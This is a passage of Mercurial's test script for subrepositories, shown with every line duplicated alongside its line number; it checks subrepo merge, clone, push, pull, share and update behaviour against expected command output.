749 $ hg ci -m 'bogus subrepo path'
749 $ hg ci -m 'bogus subrepo path'
750 abort: missing ] in subrepository source
750 abort: missing ] in subrepository source
751 [255]
751 [255]
752
752
753 Issue1986: merge aborts when trying to merge a subrepo that
753 Issue1986: merge aborts when trying to merge a subrepo that
754 shouldn't need merging
754 shouldn't need merging
755
755
756 # subrepo layout
756 # subrepo layout
757 #
757 #
758 # o 5 br
758 # o 5 br
759 # /|
759 # /|
760 # o | 4 default
760 # o | 4 default
761 # | |
761 # | |
762 # | o 3 br
762 # | o 3 br
763 # |/|
763 # |/|
764 # o | 2 default
764 # o | 2 default
765 # | |
765 # | |
766 # | o 1 br
766 # | o 1 br
767 # |/
767 # |/
768 # o 0 default
768 # o 0 default
769
769
770 $ cd ..
770 $ cd ..
771 $ rm -rf sub
771 $ rm -rf sub
772 $ hg init main
772 $ hg init main
773 $ cd main
773 $ cd main
774 $ hg init s
774 $ hg init s
775 $ cd s
775 $ cd s
776 $ echo a > a
776 $ echo a > a
777 $ hg ci -Am1
777 $ hg ci -Am1
778 adding a
778 adding a
779 $ hg branch br
779 $ hg branch br
780 marked working directory as branch br
780 marked working directory as branch br
781 (branches are permanent and global, did you want a bookmark?)
781 (branches are permanent and global, did you want a bookmark?)
782 $ echo a >> a
782 $ echo a >> a
783 $ hg ci -m1
783 $ hg ci -m1
784 $ hg up default
784 $ hg up default
785 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
785 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
786 $ echo b > b
786 $ echo b > b
787 $ hg ci -Am1
787 $ hg ci -Am1
788 adding b
788 adding b
789 $ hg up br
789 $ hg up br
790 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
790 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
791 $ hg merge tip
791 $ hg merge tip
792 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
792 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
793 (branch merge, don't forget to commit)
793 (branch merge, don't forget to commit)
794 $ hg ci -m1
794 $ hg ci -m1
795 $ hg up 2
795 $ hg up 2
796 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
796 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
797 $ echo c > c
797 $ echo c > c
798 $ hg ci -Am1
798 $ hg ci -Am1
799 adding c
799 adding c
800 $ hg up 3
800 $ hg up 3
801 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
801 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
802 $ hg merge 4
802 $ hg merge 4
803 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
803 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
804 (branch merge, don't forget to commit)
804 (branch merge, don't forget to commit)
805 $ hg ci -m1
805 $ hg ci -m1
806
806
807 # main repo layout:
807 # main repo layout:
808 #
808 #
809 # * <-- try to merge default into br again
809 # * <-- try to merge default into br again
810 # .`|
810 # .`|
811 # . o 5 br --> substate = 5
811 # . o 5 br --> substate = 5
812 # . |
812 # . |
813 # o | 4 default --> substate = 4
813 # o | 4 default --> substate = 4
814 # | |
814 # | |
815 # | o 3 br --> substate = 2
815 # | o 3 br --> substate = 2
816 # |/|
816 # |/|
817 # o | 2 default --> substate = 2
817 # o | 2 default --> substate = 2
818 # | |
818 # | |
819 # | o 1 br --> substate = 3
819 # | o 1 br --> substate = 3
820 # |/
820 # |/
821 # o 0 default --> substate = 2
821 # o 0 default --> substate = 2
822
822
823 $ cd ..
823 $ cd ..
824 $ echo 's = s' > .hgsub
824 $ echo 's = s' > .hgsub
825 $ hg -R s up 2
825 $ hg -R s up 2
826 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
826 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
827 $ hg ci -Am1
827 $ hg ci -Am1
828 adding .hgsub
828 adding .hgsub
829 $ hg branch br
829 $ hg branch br
830 marked working directory as branch br
830 marked working directory as branch br
831 (branches are permanent and global, did you want a bookmark?)
831 (branches are permanent and global, did you want a bookmark?)
832 $ echo b > b
832 $ echo b > b
833 $ hg -R s up 3
833 $ hg -R s up 3
834 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
834 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
835 $ hg ci -Am1
835 $ hg ci -Am1
836 adding b
836 adding b
837 $ hg up default
837 $ hg up default
838 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
838 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
839 $ echo c > c
839 $ echo c > c
840 $ hg ci -Am1
840 $ hg ci -Am1
841 adding c
841 adding c
842 $ hg up 1
842 $ hg up 1
843 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
843 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
844 $ hg merge 2
844 $ hg merge 2
845 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
845 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
846 (branch merge, don't forget to commit)
846 (branch merge, don't forget to commit)
847 $ hg ci -m1
847 $ hg ci -m1
848 $ hg up 2
848 $ hg up 2
849 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
849 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
850 $ hg -R s up 4
850 $ hg -R s up 4
851 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
851 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
852 $ echo d > d
852 $ echo d > d
853 $ hg ci -Am1
853 $ hg ci -Am1
854 adding d
854 adding d
855 $ hg up 3
855 $ hg up 3
856 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
856 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
857 $ hg -R s up 5
857 $ hg -R s up 5
858 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
858 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
859 $ echo e > e
859 $ echo e > e
860 $ hg ci -Am1
860 $ hg ci -Am1
861 adding e
861 adding e
862
862
863 $ hg up 5
863 $ hg up 5
864 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
864 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
865 $ hg merge 4 # try to merge default into br again
865 $ hg merge 4 # try to merge default into br again
866 subrepository s diverged (local revision: f8f13b33206e, remote revision: a3f9062a4f88)
866 subrepository s diverged (local revision: f8f13b33206e, remote revision: a3f9062a4f88)
867 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
867 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
868 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
868 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
869 (branch merge, don't forget to commit)
869 (branch merge, don't forget to commit)
870 $ cd ..
870 $ cd ..
871
871
872 test subrepo delete from .hgsubstate
872 test subrepo delete from .hgsubstate
873
873
874 $ hg init testdelete
874 $ hg init testdelete
875 $ mkdir testdelete/nested testdelete/nested2
875 $ mkdir testdelete/nested testdelete/nested2
876 $ hg init testdelete/nested
876 $ hg init testdelete/nested
877 $ hg init testdelete/nested2
877 $ hg init testdelete/nested2
878 $ echo test > testdelete/nested/foo
878 $ echo test > testdelete/nested/foo
879 $ echo test > testdelete/nested2/foo
879 $ echo test > testdelete/nested2/foo
880 $ hg -R testdelete/nested add
880 $ hg -R testdelete/nested add
881 adding testdelete/nested/foo (glob)
881 adding testdelete/nested/foo (glob)
882 $ hg -R testdelete/nested2 add
882 $ hg -R testdelete/nested2 add
883 adding testdelete/nested2/foo (glob)
883 adding testdelete/nested2/foo (glob)
884 $ hg -R testdelete/nested ci -m test
884 $ hg -R testdelete/nested ci -m test
885 $ hg -R testdelete/nested2 ci -m test
885 $ hg -R testdelete/nested2 ci -m test
886 $ echo nested = nested > testdelete/.hgsub
886 $ echo nested = nested > testdelete/.hgsub
887 $ echo nested2 = nested2 >> testdelete/.hgsub
887 $ echo nested2 = nested2 >> testdelete/.hgsub
888 $ hg -R testdelete add
888 $ hg -R testdelete add
889 adding testdelete/.hgsub (glob)
889 adding testdelete/.hgsub (glob)
890 $ hg -R testdelete ci -m "nested 1 & 2 added"
890 $ hg -R testdelete ci -m "nested 1 & 2 added"
891 $ echo nested = nested > testdelete/.hgsub
891 $ echo nested = nested > testdelete/.hgsub
892 $ hg -R testdelete ci -m "nested 2 deleted"
892 $ hg -R testdelete ci -m "nested 2 deleted"
893 $ cat testdelete/.hgsubstate
893 $ cat testdelete/.hgsubstate
894 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
894 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
895 $ hg -R testdelete remove testdelete/.hgsub
895 $ hg -R testdelete remove testdelete/.hgsub
896 $ hg -R testdelete ci -m ".hgsub deleted"
896 $ hg -R testdelete ci -m ".hgsub deleted"
897 $ cat testdelete/.hgsubstate
897 $ cat testdelete/.hgsubstate
898 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
898 bdf5c9a3103743d900b12ae0db3ffdcfd7b0d878 nested
899
899
900 test repository cloning
900 test repository cloning
901
901
902 $ mkdir mercurial mercurial2
902 $ mkdir mercurial mercurial2
903 $ hg init nested_absolute
903 $ hg init nested_absolute
904 $ echo test > nested_absolute/foo
904 $ echo test > nested_absolute/foo
905 $ hg -R nested_absolute add
905 $ hg -R nested_absolute add
906 adding nested_absolute/foo (glob)
906 adding nested_absolute/foo (glob)
907 $ hg -R nested_absolute ci -mtest
907 $ hg -R nested_absolute ci -mtest
908 $ cd mercurial
908 $ cd mercurial
909 $ hg init nested_relative
909 $ hg init nested_relative
910 $ echo test2 > nested_relative/foo2
910 $ echo test2 > nested_relative/foo2
911 $ hg -R nested_relative add
911 $ hg -R nested_relative add
912 adding nested_relative/foo2 (glob)
912 adding nested_relative/foo2 (glob)
913 $ hg -R nested_relative ci -mtest2
913 $ hg -R nested_relative ci -mtest2
914 $ hg init main
914 $ hg init main
915 $ echo "nested_relative = ../nested_relative" > main/.hgsub
915 $ echo "nested_relative = ../nested_relative" > main/.hgsub
916 $ echo "nested_absolute = `pwd`/nested_absolute" >> main/.hgsub
916 $ echo "nested_absolute = `pwd`/nested_absolute" >> main/.hgsub
917 $ hg -R main add
917 $ hg -R main add
918 adding main/.hgsub (glob)
918 adding main/.hgsub (glob)
919 $ hg -R main ci -m "add subrepos"
919 $ hg -R main ci -m "add subrepos"
920 $ cd ..
920 $ cd ..
921 $ hg clone mercurial/main mercurial2/main
921 $ hg clone mercurial/main mercurial2/main
922 updating to branch default
922 updating to branch default
923 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
923 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
924 $ cat mercurial2/main/nested_absolute/.hg/hgrc \
924 $ cat mercurial2/main/nested_absolute/.hg/hgrc \
925 > mercurial2/main/nested_relative/.hg/hgrc
925 > mercurial2/main/nested_relative/.hg/hgrc
926 [paths]
926 [paths]
927 default = $TESTTMP/mercurial/nested_absolute
927 default = $TESTTMP/mercurial/nested_absolute
928 [paths]
928 [paths]
929 default = $TESTTMP/mercurial/nested_relative
929 default = $TESTTMP/mercurial/nested_relative
930 $ rm -rf mercurial mercurial2
930 $ rm -rf mercurial mercurial2
931
931
932 Issue1977: multirepo push should fail if subrepo push fails
932 Issue1977: multirepo push should fail if subrepo push fails
933
933
934 $ hg init repo
934 $ hg init repo
935 $ hg init repo/s
935 $ hg init repo/s
936 $ echo a > repo/s/a
936 $ echo a > repo/s/a
937 $ hg -R repo/s ci -Am0
937 $ hg -R repo/s ci -Am0
938 adding a
938 adding a
939 $ echo s = s > repo/.hgsub
939 $ echo s = s > repo/.hgsub
940 $ hg -R repo ci -Am1
940 $ hg -R repo ci -Am1
941 adding .hgsub
941 adding .hgsub
942 $ hg clone repo repo2
942 $ hg clone repo repo2
943 updating to branch default
943 updating to branch default
944 cloning subrepo s from $TESTTMP/repo/s
944 cloning subrepo s from $TESTTMP/repo/s
945 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
945 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
946 $ hg -q -R repo2 pull -u
946 $ hg -q -R repo2 pull -u
947 $ echo 1 > repo2/s/a
947 $ echo 1 > repo2/s/a
948 $ hg -R repo2/s ci -m2
948 $ hg -R repo2/s ci -m2
949 $ hg -q -R repo2/s push
949 $ hg -q -R repo2/s push
950 $ hg -R repo2/s up -C 0
950 $ hg -R repo2/s up -C 0
951 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
951 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
952 $ echo 2 > repo2/s/b
952 $ echo 2 > repo2/s/b
953 $ hg -R repo2/s ci -m3 -A
953 $ hg -R repo2/s ci -m3 -A
954 adding b
954 adding b
955 created new head
955 created new head
956 $ hg -R repo2 ci -m3
956 $ hg -R repo2 ci -m3
957 $ hg -q -R repo2 push
957 $ hg -q -R repo2 push
958 abort: push creates new remote head cc505f09a8b2! (in subrepository "s")
958 abort: push creates new remote head cc505f09a8b2! (in subrepository "s")
959 (merge or see 'hg help push' for details about pushing new heads)
959 (merge or see 'hg help push' for details about pushing new heads)
960 [255]
960 [255]
961 $ hg -R repo update
961 $ hg -R repo update
962 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
962 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
963
963
964 test if untracked file is not overwritten
964 test if untracked file is not overwritten
965
965
966 (this also tests that updated .hgsubstate is treated as "modified",
966 (this also tests that updated .hgsubstate is treated as "modified",
967 when 'merge.update()' is aborted before 'merge.recordupdates()', even
967 when 'merge.update()' is aborted before 'merge.recordupdates()', even
968 if none of mode, size and timestamp of it isn't changed on the
968 if none of mode, size and timestamp of it isn't changed on the
969 filesystem (see also issue4583))
969 filesystem (see also issue4583))
970
970
971 $ echo issue3276_ok > repo/s/b
971 $ echo issue3276_ok > repo/s/b
972 $ hg -R repo2 push -f -q
972 $ hg -R repo2 push -f -q
973 $ touch -t 200001010000 repo/.hgsubstate
973 $ touch -t 200001010000 repo/.hgsubstate
974
974
975 $ cat >> repo/.hg/hgrc <<EOF
975 $ cat >> repo/.hg/hgrc <<EOF
976 > [fakedirstatewritetime]
976 > [fakedirstatewritetime]
977 > # emulate invoking dirstate.write() via repo.status()
977 > # emulate invoking dirstate.write() via repo.status()
978 > # at 2000-01-01 00:00
978 > # at 2000-01-01 00:00
979 > fakenow = 200001010000
979 > fakenow = 200001010000
980 >
980 >
981 > [extensions]
981 > [extensions]
982 > fakedirstatewritetime = $TESTDIR/fakedirstatewritetime.py
982 > fakedirstatewritetime = $TESTDIR/fakedirstatewritetime.py
983 > EOF
983 > EOF
984 $ hg -R repo update
984 $ hg -R repo update
985 b: untracked file differs
985 b: untracked file differs
986 abort: untracked files in working directory differ from files in requested revision (in subrepository "s")
986 abort: untracked files in working directory differ from files in requested revision (in subrepository "s")
987 [255]
987 [255]
988 $ cat >> repo/.hg/hgrc <<EOF
988 $ cat >> repo/.hg/hgrc <<EOF
989 > [extensions]
989 > [extensions]
990 > fakedirstatewritetime = !
990 > fakedirstatewritetime = !
991 > EOF
991 > EOF
992
992
993 $ cat repo/s/b
993 $ cat repo/s/b
994 issue3276_ok
994 issue3276_ok
995 $ rm repo/s/b
995 $ rm repo/s/b
996 $ touch -t 200001010000 repo/.hgsubstate
996 $ touch -t 200001010000 repo/.hgsubstate
997 $ hg -R repo revert --all
997 $ hg -R repo revert --all
998 reverting repo/.hgsubstate (glob)
998 reverting repo/.hgsubstate (glob)
999 reverting subrepo s
999 reverting subrepo s
1000 $ hg -R repo update
1000 $ hg -R repo update
1001 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1001 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1002 $ cat repo/s/b
1002 $ cat repo/s/b
1003 2
1003 2
1004 $ rm -rf repo2 repo
1004 $ rm -rf repo2 repo
1005
1005
1006
1006
1007 Issue1852 subrepos with relative paths always push/pull relative to default
1007 Issue1852 subrepos with relative paths always push/pull relative to default
1008
1008
1009 Prepare a repo with subrepo
1009 Prepare a repo with subrepo
1010
1010
1011 $ hg init issue1852a
1011 $ hg init issue1852a
1012 $ cd issue1852a
1012 $ cd issue1852a
1013 $ hg init sub/repo
1013 $ hg init sub/repo
1014 $ echo test > sub/repo/foo
1014 $ echo test > sub/repo/foo
1015 $ hg -R sub/repo add sub/repo/foo
1015 $ hg -R sub/repo add sub/repo/foo
1016 $ echo sub/repo = sub/repo > .hgsub
1016 $ echo sub/repo = sub/repo > .hgsub
1017 $ hg add .hgsub
1017 $ hg add .hgsub
1018 $ hg ci -mtest
1018 $ hg ci -mtest
1019 committing subrepository sub/repo (glob)
1019 committing subrepository sub/repo (glob)
1020 $ echo test >> sub/repo/foo
1020 $ echo test >> sub/repo/foo
1021 $ hg ci -mtest
1021 $ hg ci -mtest
1022 committing subrepository sub/repo (glob)
1022 committing subrepository sub/repo (glob)
1023 $ hg cat sub/repo/foo
1023 $ hg cat sub/repo/foo
1024 test
1024 test
1025 test
1025 test
1026 $ hg cat sub/repo/foo -Tjson | sed 's|\\\\|/|g'
1026 $ hg cat sub/repo/foo -Tjson | sed 's|\\\\|/|g'
1027 [
1027 [
1028 {
1028 {
1029 "abspath": "foo",
1029 "abspath": "foo",
1030 "data": "test\ntest\n",
1030 "data": "test\ntest\n",
1031 "path": "sub/repo/foo"
1031 "path": "sub/repo/foo"
1032 }
1032 }
1033 ]
1033 ]
1034 $ mkdir -p tmp/sub/repo
1034 $ mkdir -p tmp/sub/repo
1035 $ hg cat -r 0 --output tmp/%p_p sub/repo/foo
1035 $ hg cat -r 0 --output tmp/%p_p sub/repo/foo
1036 $ cat tmp/sub/repo/foo_p
1036 $ cat tmp/sub/repo/foo_p
1037 test
1037 test
1038 $ mv sub/repo sub_
1038 $ mv sub/repo sub_
1039 $ hg cat sub/repo/baz
1039 $ hg cat sub/repo/baz
1040 skipping missing subrepository: sub/repo
1040 skipping missing subrepository: sub/repo
1041 [1]
1041 [1]
1042 $ rm -rf sub/repo
1042 $ rm -rf sub/repo
1043 $ mv sub_ sub/repo
1043 $ mv sub_ sub/repo
1044 $ cd ..
1044 $ cd ..
1045
1045
1046 Create repo without default path, pull top repo, and see what happens on update
1046 Create repo without default path, pull top repo, and see what happens on update
1047
1047
1048 $ hg init issue1852b
1048 $ hg init issue1852b
1049 $ hg -R issue1852b pull issue1852a
1049 $ hg -R issue1852b pull issue1852a
1050 pulling from issue1852a
1050 pulling from issue1852a
1051 requesting all changes
1051 requesting all changes
1052 adding changesets
1052 adding changesets
1053 adding manifests
1053 adding manifests
1054 adding file changes
1054 adding file changes
1055 added 2 changesets with 3 changes to 2 files
1055 added 2 changesets with 3 changes to 2 files
1056 (run 'hg update' to get a working copy)
1056 (run 'hg update' to get a working copy)
1057 $ hg -R issue1852b update
1057 $ hg -R issue1852b update
1058 abort: default path for subrepository not found (in subrepository "sub/repo") (glob)
1058 abort: default path for subrepository not found (in subrepository "sub/repo") (glob)
1059 [255]
1059 [255]
1060
1060
1061 Ensure a full traceback, not just the SubrepoAbort part
1061 Ensure a full traceback, not just the SubrepoAbort part
1062
1062
1063 $ hg -R issue1852b update --traceback 2>&1 | grep 'raise error\.Abort'
1063 $ hg -R issue1852b update --traceback 2>&1 | grep 'raise error\.Abort'
1064 raise error.Abort(_("default path for subrepository not found"))
1064 raise error.Abort(_("default path for subrepository not found"))
1065
1065
1066 Pull -u now doesn't help
1066 Pull -u now doesn't help
1067
1067
1068 $ hg -R issue1852b pull -u issue1852a
1068 $ hg -R issue1852b pull -u issue1852a
1069 pulling from issue1852a
1069 pulling from issue1852a
1070 searching for changes
1070 searching for changes
1071 no changes found
1071 no changes found
1072
1072
1073 Try the same, but with pull -u
1073 Try the same, but with pull -u
1074
1074
1075 $ hg init issue1852c
1075 $ hg init issue1852c
1076 $ hg -R issue1852c pull -r0 -u issue1852a
1076 $ hg -R issue1852c pull -r0 -u issue1852a
1077 pulling from issue1852a
1077 pulling from issue1852a
1078 adding changesets
1078 adding changesets
1079 adding manifests
1079 adding manifests
1080 adding file changes
1080 adding file changes
1081 added 1 changesets with 2 changes to 2 files
1081 added 1 changesets with 2 changes to 2 files
1082 cloning subrepo sub/repo from issue1852a/sub/repo (glob)
1082 cloning subrepo sub/repo from issue1852a/sub/repo (glob)
1083 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1083 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1084
1084
1085 Try to push from the other side
1085 Try to push from the other side
1086
1086
1087 $ hg -R issue1852a push `pwd`/issue1852c
1087 $ hg -R issue1852a push `pwd`/issue1852c
1088 pushing to $TESTTMP/issue1852c (glob)
1088 pushing to $TESTTMP/issue1852c (glob)
1089 pushing subrepo sub/repo to $TESTTMP/issue1852c/sub/repo (glob)
1089 pushing subrepo sub/repo to $TESTTMP/issue1852c/sub/repo (glob)
1090 searching for changes
1090 searching for changes
1091 no changes found
1091 no changes found
1092 searching for changes
1092 searching for changes
1093 adding changesets
1093 adding changesets
1094 adding manifests
1094 adding manifests
1095 adding file changes
1095 adding file changes
1096 added 1 changesets with 1 changes to 1 files
1096 added 1 changesets with 1 changes to 1 files
1097
1097
1098 Incoming and outgoing should not use the default path:
1098 Incoming and outgoing should not use the default path:
1099
1099
1100 $ hg clone -q issue1852a issue1852d
1100 $ hg clone -q issue1852a issue1852d
1101 $ hg -R issue1852d outgoing --subrepos issue1852c
1101 $ hg -R issue1852d outgoing --subrepos issue1852c
1102 comparing with issue1852c
1102 comparing with issue1852c
1103 searching for changes
1103 searching for changes
1104 no changes found
1104 no changes found
1105 comparing with issue1852c/sub/repo
1105 comparing with issue1852c/sub/repo
1106 searching for changes
1106 searching for changes
1107 no changes found
1107 no changes found
1108 [1]
1108 [1]
1109 $ hg -R issue1852d incoming --subrepos issue1852c
1109 $ hg -R issue1852d incoming --subrepos issue1852c
1110 comparing with issue1852c
1110 comparing with issue1852c
1111 searching for changes
1111 searching for changes
1112 no changes found
1112 no changes found
1113 comparing with issue1852c/sub/repo
1113 comparing with issue1852c/sub/repo
1114 searching for changes
1114 searching for changes
1115 no changes found
1115 no changes found
1116 [1]
1116 [1]
1117
1117
1118 Check that merge of a new subrepo doesn't write the uncommitted state to
1118 Check that merge of a new subrepo doesn't write the uncommitted state to
1119 .hgsubstate (issue4622)
1119 .hgsubstate (issue4622)
1120
1120
1121 $ hg init issue1852a/addedsub
1121 $ hg init issue1852a/addedsub
1122 $ echo zzz > issue1852a/addedsub/zz.txt
1122 $ echo zzz > issue1852a/addedsub/zz.txt
1123 $ hg -R issue1852a/addedsub ci -Aqm "initial ZZ"
1123 $ hg -R issue1852a/addedsub ci -Aqm "initial ZZ"
1124
1124
1125 $ hg clone issue1852a/addedsub issue1852d/addedsub
1125 $ hg clone issue1852a/addedsub issue1852d/addedsub
1126 updating to branch default
1126 updating to branch default
1127 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1127 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1128
1128
1129 $ echo def > issue1852a/sub/repo/foo
1129 $ echo def > issue1852a/sub/repo/foo
1130 $ hg -R issue1852a ci -SAm 'tweaked subrepo'
1130 $ hg -R issue1852a ci -SAm 'tweaked subrepo'
1131 adding tmp/sub/repo/foo_p
1131 adding tmp/sub/repo/foo_p
1132 committing subrepository sub/repo (glob)
1132 committing subrepository sub/repo (glob)
1133
1133
1134 $ echo 'addedsub = addedsub' >> issue1852d/.hgsub
1134 $ echo 'addedsub = addedsub' >> issue1852d/.hgsub
1135 $ echo xyz > issue1852d/sub/repo/foo
1135 $ echo xyz > issue1852d/sub/repo/foo
1136 $ hg -R issue1852d pull -u
1136 $ hg -R issue1852d pull -u
1137 pulling from $TESTTMP/issue1852a (glob)
1137 pulling from $TESTTMP/issue1852a (glob)
1138 searching for changes
1138 searching for changes
1139 adding changesets
1139 adding changesets
1140 adding manifests
1140 adding manifests
1141 adding file changes
1141 adding file changes
1142 added 1 changesets with 2 changes to 2 files
1142 added 1 changesets with 2 changes to 2 files
1143 subrepository sub/repo diverged (local revision: f42d5c7504a8, remote revision: 46cd4aac504c)
1143 subrepository sub/repo diverged (local revision: f42d5c7504a8, remote revision: 46cd4aac504c)
1144 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1144 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1145 pulling subrepo sub/repo from $TESTTMP/issue1852a/sub/repo (glob)
1145 pulling subrepo sub/repo from $TESTTMP/issue1852a/sub/repo (glob)
1146 searching for changes
1146 searching for changes
1147 adding changesets
1147 adding changesets
1148 adding manifests
1148 adding manifests
1149 adding file changes
1149 adding file changes
1150 added 1 changesets with 1 changes to 1 files
1150 added 1 changesets with 1 changes to 1 files
1151 subrepository sources for sub/repo differ (glob)
1151 subrepository sources for sub/repo differ (glob)
1152 use (l)ocal source (f42d5c7504a8) or (r)emote source (46cd4aac504c)? l
1152 use (l)ocal source (f42d5c7504a8) or (r)emote source (46cd4aac504c)? l
1153 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1153 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1154 $ cat issue1852d/.hgsubstate
1154 $ cat issue1852d/.hgsubstate
1155 f42d5c7504a811dda50f5cf3e5e16c3330b87172 sub/repo
1155 f42d5c7504a811dda50f5cf3e5e16c3330b87172 sub/repo
1156
1156
1157 Check status of files when none of them belong to the first
1157 Check status of files when none of them belong to the first
1158 subrepository:
1158 subrepository:
1159
1159
1160 $ hg init subrepo-status
1160 $ hg init subrepo-status
1161 $ cd subrepo-status
1161 $ cd subrepo-status
1162 $ hg init subrepo-1
1162 $ hg init subrepo-1
1163 $ hg init subrepo-2
1163 $ hg init subrepo-2
1164 $ cd subrepo-2
1164 $ cd subrepo-2
1165 $ touch file
1165 $ touch file
1166 $ hg add file
1166 $ hg add file
1167 $ cd ..
1167 $ cd ..
1168 $ echo subrepo-1 = subrepo-1 > .hgsub
1168 $ echo subrepo-1 = subrepo-1 > .hgsub
1169 $ echo subrepo-2 = subrepo-2 >> .hgsub
1169 $ echo subrepo-2 = subrepo-2 >> .hgsub
1170 $ hg add .hgsub
1170 $ hg add .hgsub
1171 $ hg ci -m 'Added subrepos'
1171 $ hg ci -m 'Added subrepos'
1172 committing subrepository subrepo-2
1172 committing subrepository subrepo-2
1173 $ hg st subrepo-2/file
1173 $ hg st subrepo-2/file
1174
1174
1175 Check that share works with subrepo
1175 Check that share works with subrepo
1176 $ hg --config extensions.share= share . ../shared
1176 $ hg --config extensions.share= share . ../shared
1177 updating working directory
1177 updating working directory
1178 cloning subrepo subrepo-2 from $TESTTMP/subrepo-status/subrepo-2
1178 cloning subrepo subrepo-2 from $TESTTMP/subrepo-status/subrepo-2
1179 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1179 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1180 $ test -f ../shared/subrepo-1/.hg/sharedpath
1180 $ test -f ../shared/subrepo-1/.hg/sharedpath
1181 [1]
1181 [1]
1182 $ hg -R ../shared in
1182 $ hg -R ../shared in
1183 abort: repository default not found!
1183 abort: repository default not found!
1184 [255]
1184 [255]
1185 $ hg -R ../shared/subrepo-2 showconfig paths
1185 $ hg -R ../shared/subrepo-2 showconfig paths
1186 paths.default=$TESTTMP/subrepo-status/subrepo-2
1186 paths.default=$TESTTMP/subrepo-status/subrepo-2
1187 $ hg -R ../shared/subrepo-1 sum --remote
1187 $ hg -R ../shared/subrepo-1 sum --remote
1188 parent: -1:000000000000 tip (empty repository)
1188 parent: -1:000000000000 tip (empty repository)
1189 branch: default
1189 branch: default
1190 commit: (clean)
1190 commit: (clean)
1191 update: (current)
1191 update: (current)
1192 remote: (synced)
1192 remote: (synced)
1193
1193
1194 Check hg update --clean
1194 Check hg update --clean
1195 $ cd $TESTTMP/t
1195 $ cd $TESTTMP/t
1196 $ rm -r t/t.orig
1196 $ rm -r t/t.orig
1197 $ hg status -S --all
1197 $ hg status -S --all
1198 C .hgsub
1198 C .hgsub
1199 C .hgsubstate
1199 C .hgsubstate
1200 C a
1200 C a
1201 C s/.hgsub
1201 C s/.hgsub
1202 C s/.hgsubstate
1202 C s/.hgsubstate
1203 C s/a
1203 C s/a
1204 C s/ss/a
1204 C s/ss/a
1205 C t/t
1205 C t/t
1206 $ echo c1 > s/a
1206 $ echo c1 > s/a
1207 $ cd s
1207 $ cd s
1208 $ echo c1 > b
1208 $ echo c1 > b
1209 $ echo c1 > c
1209 $ echo c1 > c
1210 $ hg add b
1210 $ hg add b
1211 $ cd ..
1211 $ cd ..
1212 $ hg status -S
1212 $ hg status -S
1213 M s/a
1213 M s/a
1214 A s/b
1214 A s/b
1215 ? s/c
1215 ? s/c
1216 $ hg update -C
1216 $ hg update -C
1217 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1217 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1218 updated to "925c17564ef8: 13"
1218 updated to "925c17564ef8: 13"
1219 2 other heads for branch "default"
1219 2 other heads for branch "default"
1220 $ hg status -S
1220 $ hg status -S
1221 ? s/b
1221 ? s/b
1222 ? s/c
1222 ? s/c
1223
1223
1224 Sticky subrepositories, no changes
1224 Sticky subrepositories, no changes
1225 $ cd $TESTTMP/t
1225 $ cd $TESTTMP/t
1226 $ hg id
1226 $ hg id
1227 925c17564ef8 tip
1227 925c17564ef8 tip
1228 $ hg -R s id
1228 $ hg -R s id
1229 12a213df6fa9 tip
1229 12a213df6fa9 tip
1230 $ hg -R t id
1230 $ hg -R t id
1231 52c0adc0515a tip
1231 52c0adc0515a tip
1232 $ hg update 11
1232 $ hg update 11
1233 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1233 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
